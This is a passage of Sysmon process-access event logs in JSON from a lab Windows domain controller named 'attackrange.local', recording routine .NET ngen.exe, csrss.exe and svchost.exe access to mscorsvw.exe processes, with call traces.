{41C8662E-2242-5F25-0000-00101D120C00}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.179","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101D120C00}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.179\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101D120C00}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.179","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101D120C00}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.179\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101D120C00}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.179","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101D120C00}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.257\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B8150C00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.257","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B8150C00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.257\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B8150C00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.257","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B8150C00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B8150C00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B8150C00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.304\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104E190C00}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.304","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104E190C00}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.304\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104E190C00}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.304","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104E190C00}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
